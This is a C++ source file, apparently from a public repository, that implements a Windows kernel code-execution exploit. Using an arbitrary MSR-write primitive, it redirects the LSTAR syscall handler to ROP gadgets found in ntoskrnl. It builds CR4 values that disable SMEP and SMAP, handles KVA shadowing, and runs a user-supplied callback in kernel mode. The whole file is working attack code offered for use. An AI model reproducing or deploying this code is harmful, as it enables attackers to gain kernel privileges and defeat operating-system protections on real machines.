You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
208 lines
6.2 KiB
208 lines
6.2 KiB
#include "msrexec.hpp"
|
|
|
|
void msrexec_handler(callback_t* callback)
|
|
{
|
|
// restore LSTAR....
|
|
__writemsr(IA32_LSTAR_MSR, m_system_call);
|
|
|
|
// call usermode code...
|
|
(*callback)(ntoskrnl_base, get_system_routine);
|
|
}
|
|
|
|
namespace vdm
|
|
{
|
|
msrexec_ctx::msrexec_ctx(writemsr_t wrmsr)
|
|
: wrmsr(wrmsr)
|
|
{
|
|
if (!m_mov_cr4_gadget || !m_sysret_gadget || !m_pop_rcx_gadget)
|
|
if (!find_gadgets())
|
|
DBG_PRINT("> failed to find gadgets...\n");
|
|
|
|
if (!m_kpcr_rsp_offset || !m_kpcr_krsp_offset || !m_system_call)
|
|
if (!find_globals())
|
|
DBG_PRINT("> failed to find globals...\n");
|
|
|
|
cpuid_eax_01 cpuid_info;
|
|
__cpuid((int*)&cpuid_info, 1);
|
|
|
|
cpuid_eax_07 cpuid_features;
|
|
__cpuid((int*)&cpuid_features, 7);
|
|
|
|
cr4 cr4_value{};
|
|
cr4_value.debugging_extensions = true;
|
|
cr4_value.page_size_extensions = true;
|
|
cr4_value.machine_check_enable = true;
|
|
|
|
cr4_value.physical_address_extension =
|
|
cpuid_info.cpuid_feature_information_edx.physical_address_extension;
|
|
|
|
cr4_value.os_fxsave_fxrstor_support =
|
|
cpuid_info.cpuid_feature_information_edx.fxsave_fxrstor_instructions;
|
|
|
|
cr4_value.os_xmm_exception_support = true;
|
|
|
|
cr4_value.fsgsbase_enable =
|
|
IsProcessorFeaturePresent(PF_RDWRFSGSBASE_AVAILABLE);
|
|
|
|
cr4_value.os_xsave =
|
|
IsProcessorFeaturePresent(PF_XSAVE_ENABLED);
|
|
|
|
cr4_value.pcid_enable =
|
|
cpuid_info.cpuid_feature_information_ecx
|
|
.process_context_identifiers;
|
|
|
|
m_smep_off.flags = cr4_value.flags;
|
|
m_smep_off.smep_enable = false;
|
|
m_smep_off.smap_enable = false; // newer cpus have this on...
|
|
|
|
// WARNING: some virtual machines dont have SMEP...
|
|
// my VMWare VM doesnt... nor does my Virtual Box VM...
|
|
m_smep_on.flags = cr4_value.flags;
|
|
m_smep_on.smep_enable = cpuid_features.ebx.smep;
|
|
m_smep_on.smap_enable = cpuid_features.ebx.smap;
|
|
|
|
ntoskrnl_base =
|
|
reinterpret_cast<void*>(
|
|
utils::kmodule::get_base("ntoskrnl.exe"));
|
|
|
|
get_system_routine =
|
|
reinterpret_cast<get_system_routine_t>(
|
|
utils::kmodule::get_export(
|
|
"ntoskrnl.exe", "RtlFindExportedRoutineByName"));
|
|
|
|
DBG_PRINT("> m_pop_rcx_gadget -> 0x%p\n", m_pop_rcx_gadget);
|
|
DBG_PRINT("> m_mov_cr4_gadget -> 0x%p\n", m_mov_cr4_gadget);
|
|
DBG_PRINT("> m_sysret_gadget -> 0x%p\n", m_sysret_gadget);
|
|
DBG_PRINT("> m_kpcr_rsp_offset -> 0x%x\n", m_kpcr_rsp_offset);
|
|
DBG_PRINT("> m_kpcr_krsp_offset -> 0x%x\n", m_kpcr_krsp_offset);
|
|
DBG_PRINT("> m_system_call -> 0x%p\n", m_system_call);
|
|
|
|
DBG_PRINT("> m_smep_off -> 0x%p\n", m_smep_off.flags);
|
|
DBG_PRINT("> m_smep_on -> 0x%p\n", m_smep_on.flags);
|
|
|
|
DBG_PRINT("> check to make sure none of these^ are zero before pressing enter...\n");
|
|
std::getchar();
|
|
}
|
|
|
|
auto msrexec_ctx::find_gadgets() -> bool
|
|
{
|
|
m_mov_cr4_gadget =
|
|
utils::rop::find_kgadget(
|
|
MOV_CR4_GADGET, "xxxx");
|
|
|
|
if (!m_mov_cr4_gadget)
|
|
return {};
|
|
|
|
m_sysret_gadget =
|
|
utils::rop::find_kgadget(
|
|
SYSRET_GADGET, "xxx");
|
|
|
|
if (!m_sysret_gadget)
|
|
return {};
|
|
|
|
m_pop_rcx_gadget =
|
|
utils::rop::find_kgadget(
|
|
POP_RCX_GADGET, "xx");
|
|
|
|
if (!m_pop_rcx_gadget)
|
|
return {};
|
|
|
|
return true;
|
|
}
|
|
|
|
auto msrexec_ctx::find_globals() -> bool
|
|
{
|
|
const auto [section_data, section_rva] =
|
|
utils::pe::get_section(
|
|
reinterpret_cast<std::uintptr_t>(
|
|
LoadLibraryA("ntoskrnl.exe")), ".text");
|
|
|
|
const auto ki_system_call =
|
|
utils::scan(reinterpret_cast<std::uintptr_t>(
|
|
section_data.data()), section_data.size(),
|
|
KI_SYSCALL_SIG, KI_SYSCALL_MASK);
|
|
|
|
if (!ki_system_call)
|
|
return {};
|
|
|
|
m_system_call = (ki_system_call -
|
|
reinterpret_cast<std::uintptr_t>(
|
|
section_data.data())) + section_rva +
|
|
utils::kmodule::get_base("ntoskrnl.exe");
|
|
|
|
/*
|
|
.text:0000000140406CC0 KiSystemCall64
|
|
.text:0000000140406CC0 0F 01 F8 swapgs
|
|
.text:0000000140406CC3 65 48 89 24 25 10 00 00 00 mov gs:10h, rsp <====== + 8 bytes for gs offset...
|
|
.text:0000000140406CCC 65 48 8B 24 25 A8 01 00 00 mov rsp, gs:1A8h <======= + 17 bytes for gs offset...
|
|
*/
|
|
|
|
m_kpcr_rsp_offset = *reinterpret_cast<std::uint32_t*>(ki_system_call + 8);
|
|
m_kpcr_krsp_offset = *reinterpret_cast<std::uint32_t*>(ki_system_call + 17);
|
|
|
|
// handle KVA shadowing... if KVA shadowing is
|
|
// enabled LSTAR will point at KiSystemCall64Shadow...
|
|
SYSTEM_KERNEL_VA_SHADOW_INFORMATION kva_info = { 0 };
|
|
|
|
// if SystemKernelVaShadowInformation is not a valid class just
|
|
// return true and assume LSTAR points to KiSystemCall64...
|
|
if (NT_SUCCESS(NtQuerySystemInformation(SystemKernelVaShadowInformation, &kva_info, sizeof(kva_info), nullptr)))
|
|
{
|
|
if (kva_info.KvaShadowFlags.KvaShadowEnabled)
|
|
{
|
|
const auto [section_data, section_rva] =
|
|
utils::pe::get_section(
|
|
reinterpret_cast<std::uintptr_t>(
|
|
LoadLibraryA("ntoskrnl.exe")), "KVASCODE");
|
|
|
|
// no KVASCODE section so there is no way for LSTAR to be KiSystemCall64Shadow...
|
|
if (!section_rva || section_data.empty())
|
|
return true;
|
|
|
|
const auto ki_system_shadow_call =
|
|
utils::scan(reinterpret_cast<std::uintptr_t>(
|
|
section_data.data()), section_data.size(),
|
|
KI_SYSCALL_SHADOW_SIG, KI_SYSCALL_SHADOW_MASK);
|
|
|
|
// already set m_syscall_call so we just return true...
|
|
if (!ki_system_shadow_call)
|
|
return true;
|
|
|
|
// else we update m_system_call with KiSystemCall64Shadow...
|
|
m_system_call = (ki_system_shadow_call -
|
|
reinterpret_cast<std::uintptr_t>(
|
|
section_data.data())) + section_rva +
|
|
utils::kmodule::get_base("ntoskrnl.exe");
|
|
}
|
|
}
|
|
return true;
|
|
}
|
|
|
|
void msrexec_ctx::exec(callback_t kernel_callback)
|
|
{
|
|
const thread_info_t thread_info =
|
|
{
|
|
GetPriorityClass(GetCurrentProcess()),
|
|
GetThreadPriority(GetCurrentThread())
|
|
};
|
|
|
|
SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
|
|
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
|
|
|
|
// set LSTAR to first rop gadget... race begins here...
|
|
if (!wrmsr(IA32_LSTAR_MSR, m_pop_rcx_gadget))
|
|
DBG_PRINT("> failed to set LSTAR...\n");
|
|
else
|
|
// go go gadget kernel execution...
|
|
syscall_wrapper(&kernel_callback);
|
|
|
|
SetPriorityClass(GetCurrentProcess(), thread_info.first);
|
|
SetThreadPriority(GetCurrentThread(), thread_info.second);
|
|
}
|
|
|
|
void msrexec_ctx::set_wrmsr(writemsr_t wrmsr)
|
|
{ this->wrmsr = wrmsr; }
|
|
|
|
auto msrexec_ctx::get_wrmsr() -> writemsr_t const
|
|
{ return this->wrmsr; }
|
|
} |